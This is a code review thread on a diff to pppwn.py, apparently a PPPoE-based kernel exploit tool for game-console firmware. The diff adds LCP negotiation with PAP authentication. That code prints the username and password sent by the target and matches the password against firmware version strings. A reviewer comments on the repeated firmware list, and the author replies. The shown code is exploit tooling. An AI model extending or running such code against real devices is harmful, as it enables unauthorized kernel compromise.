pppwn.py

```diff
@@ -181,13 +181,117 @@ def __init__(self, offs, iface, stage1, stage2):
     def kdlsym(self, addr):
         return self.kaslr_offset + addr
 
+    def lcp_negotiation_with_pap(self):
+        print('[*] Sending LCP configure request...')
+        self.s.send(
+            Ether(src=self.source_mac,
+                  dst=self.target_mac,
+                  type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
+            PPP() / PPP_LCP_Configure(code=CONF_REQ, id=self.LCP_ID, options=PPP_LCP_Auth_Protocol_Option()))
+
+        print('[*] Waiting for LCP configure ACK...')
+        while True:
+            pkt = self.s.recv()
+            if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[
+                    PPP_LCP_Configure].code == CONF_ACK:
+                break
+
+        print('[*] Waiting for LCP configure request...')
+        while True:
+            pkt = self.s.recv()
+            if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[
+                    PPP_LCP_Configure].code == CONF_REQ:
+                break
+
+        print('[*] Sending LCP configure ACK...')
+        self.s.send(
+            Ether(src=self.source_mac,
+                  dst=self.target_mac,
+                  type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
+            PPP() / PPP_LCP(code=CONF_ACK, id=pkt[PPP_LCP_Configure].id))
+
+        print('[*] Waiting for PAP authentication request...')
+        while True:
+            pkt = self.s.recv()
+            if pkt and pkt.haslayer(PPP_PAP_Request):
+                if pkt[PPP_PAP_Request].username_len != 0:
+                    username = pkt[PPP_PAP_Request].username.decode("ascii")
+                    print("PAP username:", username)
+                if pkt[PPP_PAP_Request].passwd_len != 0:
+                    pwd = pkt[PPP_PAP_Request].password.decode("ascii")
+                    print("PAP password:", pwd)
+                    if pwd in ('750', '751', '755')\
```

Comment:
Rewrite to not repeat the same list of fws

Reply:
I don't think we really need to know from where the firmware was selected, so I removed the check altogether. I can rewrite the other way if you prefer it.